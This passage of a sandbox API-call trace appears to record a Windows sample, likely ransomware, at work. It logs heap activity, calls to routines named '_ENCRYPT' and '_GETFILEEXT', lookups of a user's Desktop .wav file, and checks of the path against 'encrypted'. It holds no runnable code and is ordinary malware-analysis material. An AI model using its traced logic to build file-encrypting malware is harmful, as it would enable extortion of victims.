(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=73, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x92) returned 0x7c5448 [0031.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=73, lpWideCharStr=0x7c5448, cchWideChar=73 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav") returned 73 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.045] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.047] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.047] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.048] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.048] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0031.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.049] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.049] CloseHandle (hObject=0x128) returned 1 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.049] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.050] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.050] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.050] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.050] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.051] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0xc4a5bca0, ftLastWriteTime.dwHighDateTime=0x1d5c0b4, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0x7c20c0 [0031.051] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0xc4a5bca0, ftLastWriteTime.dwHighDateTime=0x1d5c0b4, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0x7c20c0 [0031.051] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.051] CompareStringW 